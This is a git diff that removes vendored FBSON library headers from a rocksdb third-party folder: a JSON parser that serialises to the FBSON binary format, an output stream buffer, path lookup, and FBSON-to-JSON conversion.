-  case FbsonType::T_Int16: {
-    return sizeof(type_) + sizeof(int16_t);
-  }
-  case FbsonType::T_Int32: {
-    return sizeof(type_) + sizeof(int32_t);
-  }
-  case FbsonType::T_Int64: {
-    return sizeof(type_) + sizeof(int64_t);
-  }
-  case FbsonType::T_Double: {
-    return sizeof(type_) + sizeof(double);
-  }
-  case FbsonType::T_String:
-  case FbsonType::T_Binary: {
-    return ((BlobVal*)(this))->numPackedBytes();
-  }
-
-  case FbsonType::T_Object:
-  case FbsonType::T_Array: {
-    return ((ContainerVal*)(this))->numPackedBytes();
-  }
-  default:
-    return 0;
-  }
-}
-
-inline unsigned int FbsonValue::size() const {
-  switch (type_) {
-  case FbsonType::T_Int8: {
-    return sizeof(int8_t);
-  }
-  case FbsonType::T_Int16: {
-    return sizeof(int16_t);
-  }
-  case FbsonType::T_Int32: {
-    return sizeof(int32_t);
-  }
-  case FbsonType::T_Int64: {
-    return sizeof(int64_t);
-  }
-  case FbsonType::T_Double: {
-    return sizeof(double);
-  }
-  case FbsonType::T_String:
-  case FbsonType::T_Binary: {
-    return ((BlobVal*)(this))->getBlobLen();
-  }
-
-  case FbsonType::T_Object:
-  case FbsonType::T_Array: {
-    return ((ContainerVal*)(this))->getContainerSize();
-  }
-  case FbsonType::T_Null:
-  case FbsonType::T_True:
-  case FbsonType::T_False:
-  default:
-    return 0;
-  }
-}
-
-inline const char* FbsonValue::getValuePtr() const {
-  switch (type_) {
-  case FbsonType::T_Int8:
-  case FbsonType::T_Int16:
-  case FbsonType::T_Int32:
-  case FbsonType::T_Int64:
-  case FbsonType::T_Double:
-    return ((char*)this) + sizeof(FbsonType);
-
-  case FbsonType::T_String:
-  case FbsonType::T_Binary:
-    return ((BlobVal*)(this))->getBlob();
-
-  case FbsonType::T_Object:
-  case FbsonType::T_Array:
-    return ((ContainerVal*)(this))->getPayload();
-
-  case FbsonType::T_Null:
-  case FbsonType::T_True:
-  case FbsonType::T_False:
-  default:
-    return nullptr;
-  }
-}
-
-inline FbsonValue* FbsonValue::findPath(const char* key_path,
-                                        unsigned int kp_len,
-                                        const char* delim = ".",
-                                        hDictFind handler = nullptr) {
-  if (!key_path || !kp_len)
-    return nullptr;
-
-  if (!delim)
-    delim = "."; // default delimiter
-
-  FbsonValue* pval = this;
-  const char* fence = key_path + kp_len;
-  char idx_buf[21]; // buffer to parse array index (integer value)
-
-  while (pval && key_path < fence) {
-    const char* key = key_path;
-    unsigned int klen = 0;
-    // find the current key
-    for (; key_path != fence && *key_path != *delim; ++key_path, ++klen)
-      ;
-
-    if (!klen)
-      return nullptr;
-
-    switch (pval->type_) {
-    case FbsonType::T_Object: {
-      pval = ((ObjectVal*)pval)->find(key, klen, handler);
-      break;
-    }
-
-    case FbsonType::T_Array: {
-      // parse string into an integer (array index)
-      if (klen >= sizeof(idx_buf))
-        return nullptr;
-
-      memcpy(idx_buf, key, klen);
-      idx_buf[klen] = 0;
-
-      char* end = nullptr;
-      int index = (int)strtol(idx_buf, &end, 10);
-      if (end && !*end)
-        pval = ((fbson::ArrayVal*)pval)->get(index);
-      else
-        // incorrect index string
-        return nullptr;
-      break;
-    }
-
-    default:
-      return nullptr;
-    }
-
-    // skip the delimiter
-    if (key_path < fence) {
-      ++key_path;
-      if (key_path == fence)
-        // we have a trailing delimiter at the end
-        return nullptr;
-    }
-  }
-
-  return pval;
-}
-
-#pragma pack(pop)
-
-} // namespace fbson
-
-#endif // FBSON_FBSONDOCUMENT_H
diff --git a/thirdparty/rocksdb/third-party/fbson/FbsonJsonParser.h b/thirdparty/rocksdb/third-party/fbson/FbsonJsonParser.h
deleted file mode 100644
index 63b03e2..0000000
--- a/thirdparty/rocksdb/third-party/fbson/FbsonJsonParser.h
+++ /dev/null
@@ -1,741 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-/*
- * This file defines FbsonJsonParserT (template) and FbsonJsonParser.
- *
- * FbsonJsonParserT is a template class which implements a JSON parser.
- * FbsonJsonParserT parses JSON text, and serialize it to FBSON binary format
- * by using FbsonWriterT object. By default, FbsonJsonParserT creates a new
- * FbsonWriterT object with an output stream object.  However, you can also
- * pass in your FbsonWriterT or any stream object that implements some basic
- * interface of std::ostream (see FbsonStream.h).
- *
- * FbsonJsonParser specializes FbsonJsonParserT with FbsonOutStream type (see
- * FbsonStream.h). So unless you want to provide own a different output stream
- * type, use FbsonJsonParser object.
- *
- * ** Parsing JSON **
- * FbsonJsonParserT parses JSON string, and directly serializes into FBSON
- * packed bytes. There are three ways to parse a JSON string: (1) using
- * c-string, (2) using string with len, (3) using std::istream object. You can
- * use custome streambuf to redirect output. FbsonOutBuffer is a streambuf used
- * internally if the input is raw character buffer.
- *
- * You can reuse an FbsonJsonParserT object to parse/serialize multiple JSON
- * strings, and the previous FBSON will be overwritten.
- *
- * If parsing fails (returned false), the error code will be set to one of
- * FbsonErrType, and can be retrieved by calling getErrorCode().
- *
- * ** External dictionary **
- * During parsing a JSON string, you can pass a call-back function to map a key
- * string to an id, and store the dictionary id in FBSON to save space. The
- * purpose of using an external dictionary is more towards a collection of
- * documents (which has common keys) rather than a single document, so that
- * space saving will be significant.
- *
- * ** Endianness **
- * Note: FBSON serialization doesn't assume endianness of the server. However
- * you will need to ensure that the endianness at the reader side is the same
- * as that at the writer side (if they are on different machines). Otherwise,
- * proper conversion is needed when a number value is returned to the
- * caller/writer.
- *
- * @author Tian Xia <tianx@fb.com>
- */
-
-#ifndef FBSON_FBSONPARSER_H
-#define FBSON_FBSONPARSER_H
-
-#include <cmath>
-#include <limits>
-#include "FbsonDocument.h"
-#include "FbsonWriter.h"
-
-namespace fbson {
-
-const char* const kJsonDelim = " ,]}\t\r\n";
-const char* const kWhiteSpace = " \t\n\r";
-
-/*
- * Error codes
- */
-enum class FbsonErrType {
-  E_NONE = 0,
-  E_INVALID_VER,
-  E_EMPTY_STR,
-  E_OUTPUT_FAIL,
-  E_INVALID_DOCU,
-  E_INVALID_VALUE,
-  E_INVALID_KEY,
-  E_INVALID_STR,
-  E_INVALID_OBJ,
-  E_INVALID_ARR,
-  E_INVALID_HEX,
-  E_INVALID_OCTAL,
-  E_INVALID_DECIMAL,
-  E_INVALID_EXPONENT,
-  E_HEX_OVERFLOW,
-  E_OCTAL_OVERFLOW,
-  E_DECIMAL_OVERFLOW,
-  E_DOUBLE_OVERFLOW,
-  E_EXPONENT_OVERFLOW,
-};
-
-/*
- * Template FbsonJsonParserT
- */
-template <class OS_TYPE>
-class FbsonJsonParserT {
- public:
-  FbsonJsonParserT() : err_(FbsonErrType::E_NONE) {}
-
-  explicit FbsonJsonParserT(OS_TYPE& os)
-      : writer_(os), err_(FbsonErrType::E_NONE) {}
-
-  // parse a UTF-8 JSON string
-  bool parse(const std::string& str, hDictInsert handler = nullptr) {
-    return parse(str.c_str(), (unsigned int)str.size(), handler);
-  }
-
-  // parse a UTF-8 JSON c-style string (NULL terminated)
-  bool parse(const char* c_str, hDictInsert handler = nullptr) {
-    return parse(c_str, (unsigned int)strlen(c_str), handler);
-  }
-
-  // parse a UTF-8 JSON string with length
-  bool parse(const char* pch, unsigned int len, hDictInsert handler = nullptr) {
-    if (!pch || len == 0) {
-      err_ = FbsonErrType::E_EMPTY_STR;
-      return false;
-    }
-
-    FbsonInBuffer sb(pch, len);
-    std::istream in(&sb);
-    return parse(in, handler);
-  }
-
-  // parse UTF-8 JSON text from an input stream
-  bool parse(std::istream& in, hDictInsert handler = nullptr) {
-    bool res = false;
-
-    // reset output stream
-    writer_.reset();
-
-    trim(in);
-
-    if (in.peek() == '{') {
-      in.ignore();
-      res = parseObject(in, handler);
-    } else if (in.peek() == '[') {
-      in.ignore();
-      res = parseArray(in, handler);
-    } else {
-      err_ = FbsonErrType::E_INVALID_DOCU;
-    }
-
-    trim(in);
-    if (res && !in.eof()) {
-      err_ = FbsonErrType::E_INVALID_DOCU;
-      return false;
-    }
-
-    return res;
-  }
-
-  FbsonWriterT<OS_TYPE>& getWriter() { return writer_; }
-
-  FbsonErrType getErrorCode() { return err_; }
-
-  // clear error code
-  void clearErr() { err_ = FbsonErrType::E_NONE; }
-
- private:
-  // parse a JSON object (comma-separated list of key-value pairs)
-  bool parseObject(std::istream& in, hDictInsert handler) {
-    if (!writer_.writeStartObject()) {
-      err_ = FbsonErrType::E_OUTPUT_FAIL;
-      return false;
-    }
-
-    trim(in);
-
-    if (in.peek() == '}') {
-      in.ignore();
-      // empty object
-      if (!writer_.writeEndObject()) {
-        err_ = FbsonErrType::E_OUTPUT_FAIL;
-        return false;
-      }
-      return true;
-    }
-
-    while (in.good()) {
-      if (in.get() != '"') {
-        err_ = FbsonErrType::E_INVALID_KEY;
-        return false;
-      }
-
-      if (!parseKVPair(in, handler)) {
-        return false;
-      }
-
-      trim(in);
-
-      char ch = in.get();
-      if (ch == '}') {
-        // end of the object
-        if (!writer_.writeEndObject()) {
-          err_ = FbsonErrType::E_OUTPUT_FAIL;
-          return false;
-        }
-        return true;
-      } else if (ch != ',') {
-        err_ = FbsonErrType::E_INVALID_OBJ;
-        return false;
-      }
-
-      trim(in);
-    }
-
-    err_ = FbsonErrType::E_INVALID_OBJ;
-    return false;
-  }
-
-  // parse a JSON array (comma-separated list of values)
-  bool parseArray(std::istream& in, hDictInsert handler) {
-    if (!writer_.writeStartArray()) {
-      err_ = FbsonErrType::E_OUTPUT_FAIL;
-      return false;
-    }
-
-    trim(in);
-
-    if (in.peek() == ']') {
-      in.ignore();
-      // empty array
-      if (!writer_.writeEndArray()) {
-        err_ = FbsonErrType::E_OUTPUT_FAIL;
-        return false;
-      }
-      return true;
-    }
-
-    while (in.good()) {
-      if (!parseValue(in, handler)) {
-        return false;
-      }
-
-      trim(in);
-
-      char ch = in.get();
-      if (ch == ']') {
-        // end of the array
-        if (!writer_.writeEndArray()) {
-          err_ = FbsonErrType::E_OUTPUT_FAIL;
-          return false;
-        }
-        return true;
-      } else if (ch != ',') {
-        err_ = FbsonErrType::E_INVALID_ARR;
-        return false;
-      }
-
-      trim(in);
-    }
-
-    err_ = FbsonErrType::E_INVALID_ARR;
-    return false;
-  }
-
-  // parse a key-value pair, separated by ":"
-  bool parseKVPair(std::istream& in, hDictInsert handler) {
-    if (parseKey(in, handler) && parseValue(in, handler)) {
-      return true;
-    }
-
-    return false;
-  }
-
-  // parse a key (must be string)
-  bool parseKey(std::istream& in, hDictInsert handler) {
-    char key[FbsonKeyValue::sMaxKeyLen];
-    int i = 0;
-    while (in.good() && in.peek() != '"' && i < FbsonKeyValue::sMaxKeyLen) {
-      key[i++] = in.get();
-    }
-
-    if (!in.good() || in.peek() != '"' || i == 0) {
-      err_ = FbsonErrType::E_INVALID_KEY;
-      return false;
-    }
-
-    in.ignore(); // discard '"'
-
-    int key_id = -1;
-    if (handler) {
-      key_id = handler(key, i);
-    }
-
-    if (key_id < 0) {
-      writer_.writeKey(key, i);
-    } else {
-      writer_.writeKey(key_id);
-    }
-
-    trim(in);
-
-    if (in.get() != ':') {
-      err_ = FbsonErrType::E_INVALID_OBJ;
-      return false;
-    }
-
-    return true;
-  }
-
-  // parse a value
-  bool parseValue(std::istream& in, hDictInsert handler) {
-    bool res = false;
-
-    trim(in);
-
-    switch (in.peek()) {
-    case 'N':
-    case 'n': {
-      in.ignore();
-      res = parseNull(in);
-      break;
-    }
-    case 'T':
-    case 't': {
-      in.ignore();
-      res = parseTrue(in);
-      break;
-    }
-    case 'F':
-    case 'f': {
-      in.ignore();
-      res = parseFalse(in);
-      break;
-    }
-    case '"': {
-      in.ignore();
-      res = parseString(in);
-      break;
-    }
-    case '{': {
-      in.ignore();
-      res = parseObject(in, handler);
-      break;
-    }
-    case '[': {
-      in.ignore();
-      res = parseArray(in, handler);
-      break;
-    }
-    default: {
-      res = parseNumber(in);
-      break;
-    }
-    }
-
-    return res;
-  }
-
-  // parse NULL value
-  bool parseNull(std::istream& in) {
-    if (tolower(in.get()) == 'u' && tolower(in.get()) == 'l' &&
-        tolower(in.get()) == 'l') {
-      writer_.writeNull();
-      return true;
-    }
-
-    err_ = FbsonErrType::E_INVALID_VALUE;
-    return false;
-  }
-
-  // parse TRUE value
-  bool parseTrue(std::istream& in) {
-    if (tolower(in.get()) == 'r' && tolower(in.get()) == 'u' &&
-        tolower(in.get()) == 'e') {
-      writer_.writeBool(true);
-      return true;
-    }
-
-    err_ = FbsonErrType::E_INVALID_VALUE;
-    return false;
-  }
-
-  // parse FALSE value
-  bool parseFalse(std::istream& in) {
-    if (tolower(in.get()) == 'a' && tolower(in.get()) == 'l' &&
-        tolower(in.get()) == 's' && tolower(in.get()) == 'e') {
-      writer_.writeBool(false);
-      return true;
-    }
-
-    err_ = FbsonErrType::E_INVALID_VALUE;
-    return false;
-  }
-
-  // parse a string
-  bool parseString(std::istream& in) {
-    if (!writer_.writeStartString()) {
-      err_ = FbsonErrType::E_OUTPUT_FAIL;
-      return false;
-    }
-
-    bool escaped = false;
-    char buffer[4096]; // write 4KB at a time
-    int nread = 0;
-    while (in.good()) {
-      char ch = in.get();
-      if (ch != '"' || escaped) {
-        buffer[nread++] = ch;
-        if (nread == 4096) {
-          // flush buffer
-          if (!writer_.writeString(buffer, nread)) {
-            err_ = FbsonErrType::E_OUTPUT_FAIL;
-            return false;
-          }
-          nread = 0;
-        }
-        // set/reset escape
-        if (ch == '\\' || escaped) {
-          escaped = !escaped;
-        }
-      } else {
-        // write all remaining bytes in the buffer
-        if (nread > 0) {
-          if (!writer_.writeString(buffer, nread)) {
-            err_ = FbsonErrType::E_OUTPUT_FAIL;
-            return false;
-          }
-        }
-        // end writing string
-        if (!writer_.writeEndString()) {
-          err_ = FbsonErrType::E_OUTPUT_FAIL;
-          return false;
-        }
-        return true;
-      }
-    }
-
-    err_ = FbsonErrType::E_INVALID_STR;
-    return false;
-  }
-
-  // parse a number
-  // Number format can be hex, octal, or decimal (including float).
-  // Only decimal can have (+/-) sign prefix.
-  bool parseNumber(std::istream& in) {
-    bool ret = false;
-    switch (in.peek()) {
-    case '0': {
-      in.ignore();
-
-      if (in.peek() == 'x' || in.peek() == 'X') {
-        in.ignore();
-        ret = parseHex(in);
-      } else if (in.peek() == '.') {
-        in.ignore();
-        ret = parseDouble(in, 0, 0, 1);
-      } else {
-        ret = parseOctal(in);
-      }
-
-      break;
-    }
-    case '-': {
-      in.ignore();
-      ret = parseDecimal(in, -1);
-      break;
-    }
-    case '+':
-      in.ignore();
-    // fall through
-    default:
-      ret = parseDecimal(in, 1);
-      break;
-    }
-
-    return ret;
-  }
-
-  // parse a number in hex format
-  bool parseHex(std::istream& in) {
-    uint64_t val = 0;
-    int num_digits = 0;
-    char ch = tolower(in.peek());
-    while (in.good() && !strchr(kJsonDelim, ch) && (++num_digits) <= 16) {
-      if (ch >= '0' && ch <= '9') {
-        val = (val << 4) + (ch - '0');
-      } else if (ch >= 'a' && ch <= 'f') {
-        val = (val << 4) + (ch - 'a' + 10);
-      } else { // unrecognized hex digit
-        err_ = FbsonErrType::E_INVALID_HEX;
-        return false;
-      }
-
-      in.ignore();
-      ch = tolower(in.peek());
-    }
-
-    int size = 0;
-    if (num_digits <= 2) {
-      size = writer_.writeInt8((int8_t)val);
-    } else if (num_digits <= 4) {
-      size = writer_.writeInt16((int16_t)val);
-    } else if (num_digits <= 8) {
-      size = writer_.writeInt32((int32_t)val);
-    } else if (num_digits <= 16) {
-      size = writer_.writeInt64(val);
-    } else {
-      err_ = FbsonErrType::E_HEX_OVERFLOW;
-      return false;
-    }
-
-    if (size == 0) {
-      err_ = FbsonErrType::E_OUTPUT_FAIL;
-      return false;
-    }
-
-    return true;
-  }
-
-  // parse a number in octal format
-  bool parseOctal(std::istream& in) {
-    int64_t val = 0;
-    char ch = in.peek();
-    while (in.good() && !strchr(kJsonDelim, ch)) {
-      if (ch >= '0' && ch <= '7') {
-        val = val * 8 + (ch - '0');
-      } else {
-        err_ = FbsonErrType::E_INVALID_OCTAL;
-        return false;
-      }
-
-      // check if the number overflows
-      if (val < 0) {
-        err_ = FbsonErrType::E_OCTAL_OVERFLOW;
-        return false;
-      }
-
-      in.ignore();
-      ch = in.peek();
-    }
-
-    int size = 0;
-    if (val <= std::numeric_limits<int8_t>::max()) {
-      size = writer_.writeInt8((int8_t)val);
-    } else if (val <= std::numeric_limits<int16_t>::max()) {
-      size = writer_.writeInt16((int16_t)val);
-    } else if (val <= std::numeric_limits<int32_t>::max()) {
-      size = writer_.writeInt32((int32_t)val);
-    } else { // val <= INT64_MAX
-      size = writer_.writeInt64(val);
-    }
-
-    if (size == 0) {
-      err_ = FbsonErrType::E_OUTPUT_FAIL;
-      return false;
-    }
-
-    return true;
-  }
-
-  // parse a number in decimal (including float)
-  bool parseDecimal(std::istream& in, int sign) {
-    int64_t val = 0;
-    int precision = 0;
-
-    char ch = 0;
-    while (in.good() && (ch = in.peek()) == '0')
-      in.ignore();
-
-    while (in.good() && !strchr(kJsonDelim, ch)) {
-      if (ch >= '0' && ch <= '9') {
-        val = val * 10 + (ch - '0');
-        ++precision;
-      } else if (ch == '.') {
-        // note we don't pop out '.'
-        return parseDouble(in, static_cast<double>(val), precision, sign);
-      } else {
-        err_ = FbsonErrType::E_INVALID_DECIMAL;
-        return false;
-      }
-
-      in.ignore();
-
-      // if the number overflows int64_t, first parse it as double iff we see a
-      // decimal point later. Otherwise, will treat it as overflow
-      if (val < 0 && val > std::numeric_limits<int64_t>::min()) {
-        return parseDouble(in, static_cast<double>(val), precision, sign);
-      }
-
-      ch = in.peek();
-    }
-
-    if (sign < 0) {
-      val = -val;
-    }
-
-    int size = 0;
-    if (val >= std::numeric_limits<int8_t>::min() &&
-        val <= std::numeric_limits<int8_t>::max()) {
-      size = writer_.writeInt8((int8_t)val);
-    } else if (val >= std::numeric_limits<int16_t>::min() &&
-               val <= std::numeric_limits<int16_t>::max()) {
-      size = writer_.writeInt16((int16_t)val);
-    } else if (val >= std::numeric_limits<int32_t>::min() &&
-               val <= std::numeric_limits<int32_t>::max()) {
-      size = writer_.writeInt32((int32_t)val);
-    } else { // val <= INT64_MAX
-      size = writer_.writeInt64(val);
-    }
-
-    if (size == 0) {
-      err_ = FbsonErrType::E_OUTPUT_FAIL;
-      return false;
-    }
-
-    return true;
-  }
-
-  // parse IEEE745 double precision:
-  // Significand precision length - 15
-  // Maximum exponent value - 308
-  //
-  // "If a decimal string with at most 15 significant digits is converted to
-  // IEEE 754 double precision representation and then converted back to a
-  // string with the same number of significant digits, then the final string
-  // should match the original"
-  bool parseDouble(std::istream& in, double val, int precision, int sign) {
-    int integ = precision;
-    int frac = 0;
-    bool is_frac = false;
-
-    char ch = in.peek();
-    if (ch == '.') {
-      is_frac = true;
-      in.ignore();
-      ch = in.peek();
-    }
-
-    int exp = 0;
-    while (in.good() && !strchr(kJsonDelim, ch)) {
-      if (ch >= '0' && ch <= '9') {
-        if (precision < 15) {
-          val = val * 10 + (ch - '0');
-          if (is_frac) {
-            ++frac;
-          } else {
-            ++integ;
-          }
-          ++precision;
-        } else if (!is_frac) {
-          ++exp;
-        }
-      } else if (ch == 'e' || ch == 'E') {
-        in.ignore();
-        int exp2;
-        if (!parseExponent(in, exp2)) {
-          return false;
-        }
-
-        exp += exp2;
-        // check if exponent overflows
-        if (exp > 308 || exp < -308) {
-          err_ = FbsonErrType::E_EXPONENT_OVERFLOW;
-          return false;
-        }
-
-        is_frac = true;
-        break;
-      }
-
-      in.ignore();
-      ch = in.peek();
-    }
-
-    if (!is_frac) {
-      err_ = FbsonErrType::E_DECIMAL_OVERFLOW;
-      return false;
-    }
-
-    val *= std::pow(10, exp - frac);
-    if (std::isnan(val) || std::isinf(val)) {
-      err_ = FbsonErrType::E_DOUBLE_OVERFLOW;
-      return false;
-    }
-
-    if (sign < 0) {
-      val = -val;
-    }
-
-    if (writer_.writeDouble(val) == 0) {
-      err_ = FbsonErrType::E_OUTPUT_FAIL;
-      return false;
-    }
-
-    return true;
-  }
-
-  // parse the exponent part of a double number
-  bool parseExponent(std::istream& in, int& exp) {
-    bool neg = false;
-
-    char ch = in.peek();
-    if (ch == '+') {
-      in.ignore();
-      ch = in.peek();
-    } else if (ch == '-') {
-      neg = true;
-      in.ignore();
-      ch = in.peek();
-    }
-
-    exp = 0;
-    while (in.good() && !strchr(kJsonDelim, ch)) {
-      if (ch >= '0' && ch <= '9') {
-        exp = exp * 10 + (ch - '0');
-      } else {
-        err_ = FbsonErrType::E_INVALID_EXPONENT;
-        return false;
-      }
-
-      if (exp > 308) {
-        err_ = FbsonErrType::E_EXPONENT_OVERFLOW;
-        return false;
-      }
-
-      in.ignore();
-      ch = in.peek();
-    }
-
-    if (neg) {
-      exp = -exp;
-    }
-
-    return true;
-  }
-
-  void trim(std::istream& in) {
-    while (in.good() && strchr(kWhiteSpace, in.peek())) {
-      in.ignore();
-    }
-  }
-
- private:
-  FbsonWriterT<OS_TYPE> writer_;
-  FbsonErrType err_;
-};
-
-typedef FbsonJsonParserT<FbsonOutStream> FbsonJsonParser;
-
-} // namespace fbson
-
-#endif // FBSON_FBSONPARSER_H
diff --git a/thirdparty/rocksdb/third-party/fbson/FbsonStream.h b/thirdparty/rocksdb/third-party/fbson/FbsonStream.h
deleted file mode 100644
index 12723ea..0000000
--- a/thirdparty/rocksdb/third-party/fbson/FbsonStream.h
+++ /dev/null
@@ -1,182 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-/*
- * This header file defines FbsonInBuffer and FbsonOutStream classes.
- *
- * ** Input Buffer **
- * FbsonInBuffer is a customer input buffer to wrap raw character buffer. Its
- * object instances are used to create std::istream objects interally.
- *
- * ** Output Stream **
- * FbsonOutStream is a custom output stream classes, to contain the FBSON
- * serialized binary. The class is conveniently used to specialize templates of
- * FbsonParser and FbsonWriter.
- *
- * @author Tian Xia <tianx@fb.com>
- */
-
-#ifndef FBSON_FBSONSTREAM_H
-#define FBSON_FBSONSTREAM_H
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#if defined OS_WIN && !defined snprintf
-#define snprintf _snprintf
-#endif
-
-#include <inttypes.h>
-#include <iostream>
-
-namespace fbson {
-
-// lengths includes sign
-#define MAX_INT_DIGITS 11
-#define MAX_INT64_DIGITS 20
-#define MAX_DOUBLE_DIGITS 23 // 1(sign)+16(significant)+1(decimal)+5(exponent)
-
-/*
- * FBSON's implementation of input buffer
- */
-class FbsonInBuffer : public std::streambuf {
- public:
-  FbsonInBuffer(const char* str, uint32_t len) {
-    // this is read buffer and the str will not be changed
-    // so we use const_cast (ugly!) to remove constness
-    char* pch(const_cast<char*>(str));
-    setg(pch, pch, pch + len);
-  }
-};
-
-/*
- * FBSON's implementation of output stream.
- *
- * This is a wrapper of a char buffer. By default, the buffer capacity is 1024
- * bytes. We will double the buffer if realloc is needed for writes.
- */
-class FbsonOutStream : public std::ostream {
- public:
-  explicit FbsonOutStream(uint32_t capacity = 1024)
-      : std::ostream(nullptr),
-        head_(nullptr),
-        size_(0),
-        capacity_(capacity),
-        alloc_(true) {
-    if (capacity_ == 0) {
-      capacity_ = 1024;
-    }
-
-    head_ = (char*)malloc(capacity_);
-  }
-
-  FbsonOutStream(char* buffer, uint32_t capacity)
-      : std::ostream(nullptr),
-        head_(buffer),
-        size_(0),
-        capacity_(capacity),
-        alloc_(false) {
-    assert(buffer && capacity_ > 0);
-  }
-
-  ~FbsonOutStream() {
-    if (alloc_) {
-      free(head_);
-    }
-  }
-
-  void put(char c) { write(&c, 1); }
-
-  void write(const char* c_str) { write(c_str, (uint32_t)strlen(c_str)); }
-
-  void write(const char* bytes, uint32_t len) {
-    if (len == 0)
-      return;
-
-    if (size_ + len > capacity_) {
-      realloc(len);
-    }
-
-    memcpy(head_ + size_, bytes, len);
-    size_ += len;
-  }
-
-  // write the integer to string
-  void write(int i) {
-    // snprintf automatically adds a NULL, so we need one more char
-    if (size_ + MAX_INT_DIGITS + 1 > capacity_) {
-      realloc(MAX_INT_DIGITS + 1);
-    }
-
-    int len = snprintf(head_ + size_, MAX_INT_DIGITS + 1, "%d", i);
-    assert(len > 0);
-    size_ += len;
-  }
-
-  // write the 64bit integer to string
-  void write(int64_t l) {
-    // snprintf automatically adds a NULL, so we need one more char
-    if (size_ + MAX_INT64_DIGITS + 1 > capacity_) {
-      realloc(MAX_INT64_DIGITS + 1);
-    }
-
-    int len = snprintf(head_ + size_, MAX_INT64_DIGITS + 1, "%" PRIi64, l);
-    assert(len > 0);
-    size_ += len;
-  }
-
-  // write the double to string
-  void write(double d) {
-    // snprintf automatically adds a NULL, so we need one more char
-    if (size_ + MAX_DOUBLE_DIGITS + 1 > capacity_) {
-      realloc(MAX_DOUBLE_DIGITS + 1);
-    }
-
-    int len = snprintf(head_ + size_, MAX_DOUBLE_DIGITS + 1, "%.15g", d);
-    assert(len > 0);
-    size_ += len;
-  }
-
-  pos_type tellp() const { return size_; }
-
-  void seekp(pos_type pos) { size_ = (uint32_t)pos; }
-
-  const char* getBuffer() const { return head_; }
-
-  pos_type getSize() const { return tellp(); }
-
- private:
-  void realloc(uint32_t len) {
-    assert(capacity_ > 0);
-
-    capacity_ *= 2;
-    while (capacity_ < size_ + len) {
-      capacity_ *= 2;
-    }
-
-    if (alloc_) {
-      char* new_buf = (char*)::realloc(head_, capacity_);
-      assert(new_buf);
-      head_ = new_buf;
-    } else {
-      char* new_buf = (char*)::malloc(capacity_);
-      assert(new_buf);
-      memcpy(new_buf, head_, size_);
-      head_ = new_buf;
-      alloc_ = true;
-    }
-  }
-
- private:
-  char* head_;
-  uint32_t size_;
-  uint32_t capacity_;
-  bool alloc_;
-};
-
-} // namespace fbson
-
-#endif // FBSON_FBSONSTREAM_H
diff --git a/thirdparty/rocksdb/third-party/fbson/FbsonUtil.h b/thirdparty/rocksdb/third-party/fbson/FbsonUtil.h
deleted file mode 100644
index 2b6d6f5..0000000
--- a/thirdparty/rocksdb/third-party/fbson/FbsonUtil.h
+++ /dev/null
@@ -1,163 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-/*
- * This header file defines miscellaneous utility classes.
- *
- * @author Tian Xia <tianx@fb.com>
- */
-
-#ifndef FBSON_FBSONUTIL_H
-#define FBSON_FBSONUTIL_H
-
-#include <sstream>
-#include "FbsonDocument.h"
-
-namespace fbson {
-
-#define OUT_BUF_SIZE 1024
-
-/*
- * FbsonToJson converts an FbsonValue object to a JSON string.
- */
-class FbsonToJson {
- public:
-  FbsonToJson() : os_(buffer_, OUT_BUF_SIZE) {}
-
-  // get json string
-  const char* json(const FbsonValue* pval) {
-    os_.clear();
-    os_.seekp(0);
-
-    if (pval) {
-      intern_json(pval);
-    }
-
-    os_.put(0);
-    return os_.getBuffer();
-  }
-
- private:
-  // recursively convert FbsonValue
-  void intern_json(const FbsonValue* val) {
-    switch (val->type()) {
-    case FbsonType::T_Null: {
-      os_.write("null", 4);
-      break;
-    }
-    case FbsonType::T_True: {
-      os_.write("true", 4);
-      break;
-    }
-    case FbsonType::T_False: {
-      os_.write("false", 5);
-      break;
-    }
-    case FbsonType::T_Int8: {
-      os_.write(((Int8Val*)val)->val());
-      break;
-    }
-    case FbsonType::T_Int16: {
-      os_.write(((Int16Val*)val)->val());
-      break;
-    }
-    case FbsonType::T_Int32: {
-      os_.write(((Int32Val*)val)->val());
-      break;
-    }
-    case FbsonType::T_Int64: {
-      os_.write(((Int64Val*)val)->val());
-      break;
-    }
-    case FbsonType::T_Double: {
-      os_.write(((DoubleVal*)val)->val());
-      break;
-    }
-    case FbsonType::T_String: {
-      os_.put('"');
-      os_.write(((StringVal*)val)->getBlob(), ((StringVal*)val)->getBlobLen());
-      os_.put('"');
-      break;
-    }
-    case FbsonType::T_Binary: {
-      os_.write("\"<BINARY>", 9);
-      os_.write(((BinaryVal*)val)->getBlob(), ((BinaryVal*)val)->getBlobLen());
-      os_.write("<BINARY>\"", 9);
-      break;
-    }
-    case FbsonType::T_Object: {
-      object_to_json((ObjectVal*)val);
-      break;
-    }
-    case FbsonType::T_Array: {
-      array_to_json((ArrayVal*)val);
-      break;
-    }
-    default:
-      break;
-    }
-  }
-
-  // convert object
-  void object_to_json(const ObjectVal* val) {
-    os_.put('{');
-
-    auto iter = val->begin();
-    auto iter_fence = val->end();
-
-    while (iter < iter_fence) {
-      // write key
-      if (iter->klen()) {
-        os_.put('"');
-        os_.write(iter->getKeyStr(), iter->klen());
-        os_.put('"');
-      } else {
-        os_.write(iter->getKeyId());
-      }
-      os_.put(':');
-
-      // convert value
-      intern_json(iter->value());
-
-      ++iter;
-      if (iter != iter_fence) {
-        os_.put(',');
-      }
-    }
-
-    assert(iter == iter_fence);
-
-    os_.put('}');
-  }
-
-  // convert array to json
-  void array_to_json(const ArrayVal* val) {
-    os_.put('[');
-
-    auto iter = val->begin();
-    auto iter_fence = val->end();
-
-    while (iter != iter_fence) {
-      // convert value
-      intern_json((const FbsonValue*)iter);
-      ++iter;
-      if (iter != iter_fence) {
-        os_.put(',');
-      }
-    }
-
-    assert(iter == iter_fence);
-
-    os_.put(']');
-  }
-
- private:
-  FbsonOutStream os_;
-  char buffer_[OUT_BUF_SIZE];
-};
-
-} // namespace fbson
-
-#endif // FBSON_FBSONUTIL_H
